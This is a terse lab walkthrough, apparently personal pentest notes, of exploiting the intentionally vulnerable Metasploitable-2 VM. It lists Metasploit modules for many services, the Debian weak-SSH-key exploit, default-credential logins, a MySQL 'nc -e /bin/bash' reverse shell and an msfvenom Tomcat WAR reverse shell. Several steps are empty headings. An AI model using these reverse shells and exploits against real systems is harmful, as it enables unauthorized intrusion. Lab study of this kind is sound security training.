Metasploitable-2
This tutorial is sourced from Bob1Bob2 Pentest Notes
Last updated
This tutorial is sourced from Bob1Bob2 Pentest Notes
Last updated
netdiscover
Nmap
Metasploit
smbclient
enum4linux
Nikto
Use netdiscover to detect target IP address
192.168.79.179 is the target.
Then run nmap to detect opening ports and running services on the target machine.
nmap -sV -v -O -A -T5 192.168.79.179 -p-
search vsftpd
get the root:
get meterpreter:
Getting access to a system with a writeable filesystem
Since the nmap shows the openssh version is 4.7. I googled it and find it use Openssl 0.9.8g
search openssl exploit:
searchsploit openssl
Looks like these exploits can be used. The vulnerability is CVE-2008-0166.
I use 5720.py.
First, download precalculated vulnerable keys
wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2
unzip it
tar jxf 5622.tar.bz2
run the command:
python 5720.py rsa/2048/ 192.168.79.179 root 22 5
rsa/2048 is the folder contains the keys.
Found keys:
login the box:
ssh -l root -p22 -i rsa/2048//c551f0a5d2f76d88b58b3ae90ceb617a-22002 192.168.79.179
in msfconsole, search telnet
In the banner, shows username/password
or you can just telnet 192.168.79.179 to grab the banner.
login
telnet 192.168.79.179 -l msfadmin
Nagviate to port 80. there is a Twiki, search twiki, find a exploit
exploit/unix/webapp/twiki_history
Use nikto, I found the page phpinfo.php is availabe.
I got the php version is 5.2.4.
search the php_cgi
found the exploit exploit/multi/http/php_cgi_arg_injection
may be the vulberable version.
Enumerate smtp:
enum4linux 192.168.79.179
looks like wide links
looks good
now use smbclient to login
smbclient //192.168.79.179/tmp
since the samba version is 3.0.20, I found this module:
exploit/multi/samba/usermap_script
msf > search unreal ircd
same version
Nmap shows port 1099 rmiregistry GNU Classpath grmiregistry
in metasploit search rmiregistry, got one exploit
exploit/multi/misc/java_rmi_server
nothing cool,
nc 192.168.79.179 1524
Discover MySQL version:
Brute Force MySQL Login
get root and guest without setting password
Once get the credential, login to MySQL
mysql -h 192.168.79.179 -u root -p
In Kali setup nc:
nc -nlvp 1234
In MySQL, execute system command:
mysql> system nc 192.168.79.173 1234 -e /bin/bash
get the root:
search distccd, find a exploit exploit/unix/misc/distcc_exec
search postgresql, find a module auxiliary/scanner/postgres/postgres_login
find username/password, login to postgresql.
psql -h 192.168.79.179 -U postgres
There is another exploit: exploit/linux/postgres/postgres_payload
search vnc, find a auxiliary/scanner/vnc/vnc_login
find a password:
use this password to login vnc
vncviewer 192.168.79.179
search x11, find a scanner auxiliary/scanner/x11/open_x11
shows [*] 192.168.79.179:6000 - 192.168.79.179 Access Denied
now, try to login use telnet username/password to X11
ssh -X -l msfadmin 192.168.79.179
use Nikto to scan
nikto -h 182.168.79.179:8180
defalut credential is found: ID ‘tomcat’, PW ‘tomcat’.
nagviate to http://192.168.79.179:8180/manager/html, input username/password, and we are in:
same shit, generate upload WAR reverse shell backdoor.
create webshell called index.jsp (from pentester lab, you may generate it using msfvenom)
now pack the webshell
deploy it and visit http://192.168.79.179:8180/webshell/index.jsp?
use msfvenom to create webshell:
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.79.173 lport=4444 -f war > webshell1.war
setup nc in kali, deploy it and visit http://192.168.79.179:8180/webshell1/
After connection, get the shell:
python -c 'import pty; pty.spawn("/bin/bash")'
Use Metasploit:
msf > search tomcat
search drb, find an exploit exploit/linux/misc/drb_remote_codeexec
